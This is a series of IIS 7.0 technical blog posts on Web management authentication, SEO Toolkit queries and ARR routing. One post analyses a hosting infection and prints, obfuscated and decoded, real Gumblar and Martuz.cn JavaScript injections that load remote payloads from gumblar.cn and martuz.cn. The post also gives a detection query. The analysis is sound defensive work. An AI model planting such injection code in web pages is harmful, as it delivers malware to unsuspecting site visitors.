    • 2 Comments

    Today in the IIS.NET Forums a question was asked about whether it was possible to use the same IIS Manager Users authentication in the context of a Web application, so that you could have, say, something like WebDAV using the same credentials you use with IIS Manager Remote Administration.

    IIS Manager Remote Administration allows you to connect and manage your Web site using credentials that are not Windows users, but instead just a combination of user name and password. This is implemented following a provider model, where the default implementation we ship uses our Administration.config file (%windir%\system32\inetsrv\config\administration.config) as the storage for these users. However, you can easily implement a base class to authenticate against a database or any other user store if needed. This means you can build your own application and call our APIs (ManagementAuthentication).

    Even better, in the context of a Web site running in IIS 7.0 you can actually implement this without having to write a single line of code.

    Disclaimer: Out of the box, Administration.config only grants administrators permission to read the file. This means that a Web application will not be able to access it, so you need to change the ACLs on the file to grant read permissions to your application; make sure you limit the read access to the minimum required, as shown below.

    Here is how you do it:

    1. First make sure that your Web site is using SSL. (In IIS Manager, right-click your Web site, choose Edit Bindings, and add an SSL binding.)
    2. So that we can restrict permissions further, make your application run in its own application pool; this way we can change the required ACLs to affect only your application pool and nothing else. Using IIS Manager, go to Application Pools and add a new application pool running in Integrated mode, and give it a name you can easily remember, say WebMgmtAppPool (we will use this in the permissions below).
    3. Disable Anonymous Authentication in your application. (Use IIS Manager, drill-down to your application, double click the Authentication feature and disable Anonymous Authentication and any other authentication module enabled).
    4. Enable the Web Management Authentication module in your application; you can add a Web.config file with the following contents:
      <configuration>
        <system.webServer>
          <modules>
            <add name='WebManagementBasicAuthentication'
                 type='Microsoft.Web.Management.Server.WebManagementBasicAuthenticationModule, Microsoft.Web.Management, Version=7.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' />
          </modules>
        </system.webServer>
      </configuration>
    5. Modify the ACL's in the required configuration files:
      1. Give read access to the config directory so we can access the files using the following command line (note that we are only giving permissions to the Application Pool)
        icacls %windir%\system32\inetsrv\config /grant "IIS AppPool\WebMgmtAppPool":(R)
      2. Give read access to the redirection.config:
        icacls %windir%\system32\inetsrv\config\redirection.config /grant "IIS AppPool\WebMgmtAppPool":(R)
      3. Finally give read access to administration.config:
        icacls %windir%\system32\inetsrv\config\administration.config /grant "IIS AppPool\WebMgmtAppPool":(R)
    6. At this point you should be able to navigate to your application using any browser and you should get a prompt for credentials that will be authenticated against the IIS Manager Users.

    What is also nice is that you can use URL Authorization to further restrict permissions on your pages for these users. For example, if I didn't want a particular IIS Manager user (say MyIisManagerUser) to access the Web site, I could just configure this in the same web.config:

    <configuration>
      <system.webServer>
        <security>
          <authorization>
            <add accessType="Deny" users="MyIisManagerUser" />
          </authorization>
        </security>
      </system.webServer>
    </configuration>

    If you want to learn more about remote administration and how to configure it you can read: http://learn.iis.net/page.aspx/159/configuring-remote-administration-and-feature-delegation-in-iis-7/

  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at it to see if I could spot anything weird, since according to his Web hosting provider it was being flagged as malware-infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and looked for anything suspicious in them; however, he was not able to find anything. My friend then went back to his hosting provider, mentioned that they had not been able to find anything problematic, and asked whether it could be something in the server configuration, to which they replied sarcastically that it was probably ignorance on his Web site designer's part.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do is start by crawling the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of the pages and resources his Web site contains. I knew that malware usually hides either in executables or in scripts on the server, so I started by looking at the different content types shown in the "Content Types Summary" inside the Content reports on the dashboard page.

    [Image: Content Types Summary report in the Site Analysis dashboard]

    I was surprised not to find a single executable and to see only two very simple JavaScript files, which did not look like malware in any way. Based on previous knowledge, I knew that malware in HTML pages is usually hidden behind a funky-looking script that is encoded and typically uses the eval function to run the code. So I quickly did a query for those HTML pages which contain both the word eval and the word unescape. I know there are valid scripts that use those features, since they exist for a reason, but it was a good way to start scoping the pages.

    Gumblar and Martuz.cn Malware on sight

    [Image: Query editor filtering HTML pages that contain "eval" and "unescape"]

    After running the query as shown above, I got a set of HTML files which all returned status code 404 – NOT FOUND. Double-clicking any of them and looking at the HTML markup made it immediately obvious that they were infected with malware; look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you who, like me, do not particularly enjoy reading encoded JavaScript: what these two scripts do is simply unescape the funky-looking string and then execute it. I have decoded the script that would get executed and show it below, just to showcase how this malware works. Note how they special-case a couple of browsers, including Chrome, to then request a particular script that causes the real damage.

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
    }

    And:

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//martuz.cn/vid/?id=" + j + "><\/script>");
    }

    Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.
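    If you ever need to inspect a similar blob yourself, you can decode it offline without ever executing it. Here is a minimal sketch of the substitute-then-unescape trick these scripts use; the encoded string below is a harmless, made-up stand-in for the real payload, and console.log replaces the eval call:

    ```javascript
    // The malware passes a regex (such as /"/g) that maps a disguise character back to '%',
    // then feeds the result to unescape() and eval(). To inspect it safely, apply the same
    // substitution but print the decoded source instead of evaluating it.
    const encoded = 'a"6cert"28"22hi"22"29"3b'; // hypothetical stand-in for the real blob
    const decoded = unescape(encoded.replace(/"/g, '%'));
    console.log(decoded); // alert("hi");
    ```

    Reading the decoded output is safe; pasting it into eval is exactly what the attackers are counting on.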

    Final data

    Now, this clearly means they were infected with malware, and it clearly seemed that the problem was not in the Web application; the infection was in the error pages being served by the server when an error happens. As a next step, to guide them with more specifics, I needed to determine which Web server they were using. That is as easy as inspecting the response headers in the IIS SEO Toolkit, which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With the big disclaimer that I know nothing about Apache, I then pointed them to their .htaccess file and the httpd.conf file to look for ErrorDocument directives; those would show them which files were infected and whether it was a problem in their application or in the server.
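    For context, custom error pages in Apache are wired up with ErrorDocument directives like the following (the paths here are illustrative, not from their server); whichever files such directives point to were the natural place to look for the infection:

    ```apache
    # In httpd.conf or .htaccess -- illustrative paths
    ErrorDocument 404 /errors/not_found.html
    ErrorDocument 500 /errors/server_error.html
    ```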

    Case Closed

    It turns out that after they went back to their hoster with all this evidence, the hoster finally realized the server was infected and was able to clean up the malware. The IIS SEO Toolkit helped me identify this quickly because it is able to see the Web site with the same eyes a search engine would, following every link and letting me run easy queries to find information about it. In future versions of the IIS SEO Toolkit you can expect to be able to find these kinds of things in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and use "Open Query" with to see if you are infected with this malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
      <filter>
        <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <expression field="FileContents" operator="Contains" value="unescape" />
        <expression field="FileContents" operator="Contains" value="eval" />
      </filter>
      <displayFields>
        <field name="URL" />
        <field name="StatusCode" />
        <field name="Title" />
        <field name="Description" />
      </displayFields>
    </query>
  • CarlosAg Blog

    IIS SEO Toolkit: Find warnings of HTTP content linked by pages using HTTPS

    • 0 Comments

    Are you a developer/owner/publisher/etc. of a site that uses HTTPS (SSL) for secure access? If you are, please continue reading.

    Have you ever visited a Web site that is secured using SSL (Secure Sockets Layer) just to get an ugly Security Warning message like:

    Do you want to view only the webpage content that was delivered securely?

    This webpage contains content that will not be delivered using a secure HTTPS connection, which could compromise the security of the entire webpage.

    [Image: Internet Explorer mixed-content security warning dialog]

    How frustrating is this for you? Do you think end users know what the right answer to the question above is? Honestly, the Yes/No buttons and the phrasing of the question even feel like they would cause me to click the wrong option.

    What this warning is basically trying to tell the user is that even though he/she navigated to a page you thought was secured using SSL, the page is consuming resources that come from an unsecured location. These could be scripts, style sheets, or other types of objects that could potentially pose a security risk, since they could be tampered with on the way or come from different locations.

    As a site owner/developer/publisher/etc., you should always make sure you are not going to expose your customers to such a bad experience, leaving them with a question they can't possibly answer right. If they choose 'Yes', they get an incomplete experience, with broken images, broken scripts, or something worse; if they choose 'No', that is even worse, since it means you are teaching them to ignore these warnings, which could in some cases be real signs of security issues.

    Bottom line: any issue like this should be treated as a bug and fixed in the application if possible.

    But the big question is: how do you find these issues? Well, the answer is very simple yet extremely time-consuming: navigate to every single page of your site using SSL and, as you do, examine every single resource in the page (styles, objects, scripts, etc.) and check whether its URL points to a non-HTTPS location.

    Enter the IIS Search Engine Optimization (SEO) Toolkit.

    The good news is that using the SEO Toolkit makes it extremely simple to find these issues.

    1. To do that just start a new Analysis using the IIS SEO Toolkit using the HTTPS URL of your site, for example: https://www.example.com/
    2. Once the analysis is over just select the option “Query->Open Query” and open the following XML file:
    3. <?xml version="1.0" encoding="utf-8"?>
       <query dataSource="links">
         <filter>
           <expression field="LinkingUrl" operator="Begins" value="https://" />
           <expression field="LinkedUrl" operator="Begins" value="http://" />
           <expression field="LinkType" operator="NotEquals" value="Link" />
           <expression field="LinkType" operator="NotEquals" value="Rss" />
         </filter>
         <displayFields>
           <field name="LinkingUrl" />
           <field name="LinkedUrl" />
           <field name="LinkedStatus" />
           <field name="LinkType" />
         </displayFields>
       </query>
    4. Just by doing that, it will open a query window showing all the links in your site that have this problem. Note that the query simply looks for all the resources linked from a URL that begins with HTTPS where the target resource uses HTTP, excluding normal links and RSS links (since those do not have this problem).
    5. This is what my quick repro looks like. Note that it actually tells you the type of resource (an image and a style sheet in this case). Additionally, if you double-click a row it will show you exactly the place in the markup where the problem occurs so you can easily fix it.

    [Image: Query results showing HTTP resources linked from HTTPS pages]

    Summary

    Using the IIS SEO Toolkit and its powerful query engine, you can easily detect conditions on your site that would otherwise take an incredible amount of time to find and be prohibitively expensive to check constantly.

  • CarlosAg Blog

    Application Request Routing and the IIS 7.0 Web Management Service

    • 1 Comments

    Yesterday I was having a conversation with Anil Ruia, who happens to be the ARR (Application Request Routing) developer, and based on customer feedback we discussed the idea of using ARR in the context of remote management in IIS. This solves a question several people have asked me before, and I thought it would be fun to try it out.

    Basically, the question I got asked was "Can I have a single entry point exposed for remote management?", or in other words, "Can I provide users with remote administration by giving them a single server name like management.myhostingcompany.com, instead of having to give them the specific machine name where their site lives?". So far the answer to these questions was "not easily"; however, with the use of ARR and URL Rewrite we will see how easy it is to achieve this.

    The only thing you need for this to work is to install the new URL Rewrite and ARR modules, both available here: http://blogs.iis.net/bills/archive/2008/07/09/new-iis7-releases-url-rewrite-application-routing-and-load-balancing-and-powershell-cmd-lets.aspx.

    Background

    The Web Management Service (WMSvc) is the service that enables remote administration for IIS 7.0 Manager, providing an HTTPS endpoint that exposes Web-service-like functionality to manage the Web server (IIS) remotely. This service uses HTTPS for its communication and exposes several configuration options, such as giving access to non-Windows users (what we call IIS Manager Users), providing a list of IP restrictions, supporting only local connections, and many more, all of which can be managed using the Management Service feature inside IIS Manager.

    To enable remote administration you typically need to: 1) configure a valid certificate for SSL, 2) allow remote connections, and 3) start the WMSvc service, all of which can be done in IIS Manager. Once you have successfully enabled the remote service, you should be able to go to a different machine and connect remotely.
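    For reference, the "allow remote connections" step ultimately flips a registry value that can also be scripted; here is a sketch as a .reg fragment (the value location is from memory, so verify it against the WMSvc documentation before relying on it):

    ```
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WebManagement\Server]
    "EnableRemoteManagement"=dword:00000001
    ```

    After changing it, restart the service (net stop wmsvc, then net start wmsvc) for the setting to take effect.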

    Note: If you are using Windows Vista, Windows XP, or Windows 2003 to connect to a Windows Server 2008 you need to download and install the client to do this: http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1626

    However, one of the drawbacks is that in order to connect to a Web site, the end user needs to know the machine name as well as the name of the Web site they will be connecting to, which it would sometimes be better to make dynamic. The following image shows the information required when connecting to a Web site. Note that if you are connecting to an application, you also need to enter the name of the application.

    [Image: ConnectingToSite – the Connect to Site dialog in IIS Manager]

    This can potentially reduce your deployment flexibility, since your customers now have specific knowledge of the physical machine, which limits your ability to move the site to a different machine or even change the name of the site where it is hosted.

    ARR and URL Rewrite to the rescue.

    ARR has several very interesting capabilities that are really useful for this scenario. First, we can configure it to act as a proxy and basically forward the requests to another server where they actually get processed. This is the simplest configuration option, and what it allows is something similar to the next image:

    [Image: WMSvcRouting – ARR front end forwarding management requests to WMSvc]

    To set up this configuration, where a front-end management server forwards the IIS remote management requests to another server running WMSvc, you have to:

    1. Install ARR and URL Rewrite on the server that is intended to be used as the front end for management requests. Let's call this ServerA.
    2. Create a new Web Site.
      1. Navigate to IIS Manager->Site
      2. Click Add Web Site.
    3. In the dialog set: Site name: ManagementSite, Binding: https, Port: 8172; choose a valid SSL certificate and specify a physical path. Click OK.
    3. Configure URL Rewrite to Route requests to the IIS Management Service running in the other computer.
      1. Navigate to IIS Manager->Sites->Management Site->URL Rewrite Module
      2. Click Add Rule
      3. Set: Name: RouteWMSvc, Pattern:.*, Rewrite URL:https://<RemoteServer>:8172/{R:0}, Stop Processing rules: Checked.
    4. This should generate a web.config with content similar to the following (note that my back end, i.e. the RemoteServer, is carlosag2-iis below):

        <configuration>
          <system.webServer>
            <rewrite>
              <rules>
                <rule name="RouteWMSvc" stopProcessing="true">
                  <match url=".*" />
                  <action type="Rewrite" url="https://carlosag2-iis:8172/{R:0}" />
                </rule>
              </rules>
            </rewrite>
          </system.webServer>
        </configuration>

    4. Now you can run IIS Manager on any client machine, specify ServerA as the machine name, and specify any Web site on the RemoteServer; the result is that all requests will be forwarded to the WMSvc running on the remote server.

    Now, that is interesting, and here is the scenario it enables: you can use WMSvc IP Request Filtering on the RemoteServer to only allow calls from the management server, where you can apply further configuration. Note that this also means you can have a single public SSL certificate on the management server and use privately issued certificates (or potentially even self-signed certificates) on the RemoteServer, since you control installing the certificate into the management server. It also means that customers no longer use the physical name of the RemoteServer machine; instead they connect to the management server, which lets you move them to another machine without ever updating your clients.

    Troubleshooting: If you are having trouble testing this, the best thing to do is enable Failed Request Tracing on the ManagementSite, which will tell you exactly what is going on. For example, you will get entries like:

    Warning: ModuleName="ApplicationRequestRouting", Notification="EXECUTE_REQUEST_HANDLER", HttpStatus="502", HttpReason="Bad Gateway", HttpSubStatus="3", ErrorCode="2147954575", ConfigExceptionInfo=""

    If you look up the ErrorCode, it is actually ERROR_WINHTTP_SECURE_FAILURE, which means you most likely have issues with the certificate. In my case, just to test this, I generated a self-signed certificate on the RemoteServer with the name of the machine (carlosag2-iis) and then installed that certificate, using the MMC Certificates snap-in, into the Trusted Root Certification Authorities store on the management server. Disclaimer/Warning!! This is something you should only do for testing purposes or if you know what you are doing.
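
    The decimal ErrorCode in the trace is just an HRESULT, so converting it to hex makes it much easier to look up in the Windows error code references. A quick sketch of the conversion (decode_error is just a helper name I made up for illustration):

```python
def decode_error(code):
    """Convert a Failed Request Tracing decimal ErrorCode into its hex
    HRESULT form and the underlying WinHTTP error number (low 16 bits)."""
    hresult = code & 0xFFFFFFFF
    return hex(hresult), hresult & 0xFFFF

hresult, winhttp = decode_error(2147954575)
print(hresult, winhttp)  # 0x80072f8f 12175 -> ERROR_WINHTTP_SECURE_FAILURE
```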

    More Advanced Stuff... Dynamically choosing the machine

    Now, trying to push the capabilities of this, I decided to tackle another, closely related request that we've heard: "Can I have a single management server and dynamically route the requests to the machine where a particular site lives?"

    The following picture represents this, where the Management Server dynamically resolves the server that it should talk to using the URL Rewrite Maps functionality.

    WMSvcRoutingMultiple

    It turns out this is really simple using URL Rewrite: you can write a rewrite rule that matches the site name included as part of the query string and use the Rewrite Maps support to figure out the machine where the site lives. The following shows such a rule:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <rewrite>
          <rules>
            <rule name="RouteWMSvc" stopProcessing="true">
              <match url=".*" />
              <conditions>
                <add input="{QUERY_STRING}" pattern="Site=([^&amp;]+)" />
              </conditions>
              <action type="Rewrite" url="https://{ServersTable:{C:1}}:8172/{R:0}" appendQueryString="true" />
            </rule>
          </rules>
          <rewriteMaps>
            <rewriteMap name="ServersTable">
              <add key="CarlosAgWebSite" value="carlosag2-iis" />
              <add key="SomeOtherUserSite" value="carlosag1-iis" />
              <add key="SomeOtherUserSite2" value="carlosag3-iis" />
            </rewriteMap>
          </rewriteMaps>
        </rewrite>
      </system.webServer>
    </configuration>

    Basically, URL Rewrite matches every request and uses the condition entry to parse the query string and find the site name within it. It then uses the ServersTable map to resolve the machine name for that site and rewrites the request to the machine where the site is currently located. This routes "https://localhost:8172/Service.axd?...&Site=CarlosAgWebSite" to "https://carlosag2-iis:8172/Service.axd?...&Site=CarlosAgWebSite". The end result is that you can update this table at any time and have ARR route requests to the right machine, giving you complete flexibility in the deployment of sites.

    One thing to note is that URL Rewrite is only one way to make the ARR scenario work; you could also write your own module with any dynamic behavior you need, such as querying a database or a provisioning system, and rewrite the URL programmatically in a way that ARR understands so that it does the routing automatically.

    Also worth mentioning: ARR has many more features than just this, including load balancing of requests and other interesting capabilities that I will try to get back to in a future post.

    With all this you can imagine several benefits: a single public endpoint for the remote management of multiple servers; only one valid certificate needed on the public-facing machine; the ability to relocate sites at will, since customers never know the real machine name where their site lives; and the option to use a similar technique to rewrite even the site name, giving customers a friendly name such as their user name.

    Acknowledgements: I want to thank Anil Ruia and Daniel Vasquez Lopez who helped figuring out a few issues during this blog and Ruslan Yakushev and Won Yoo for reviewing its technical accuracy.
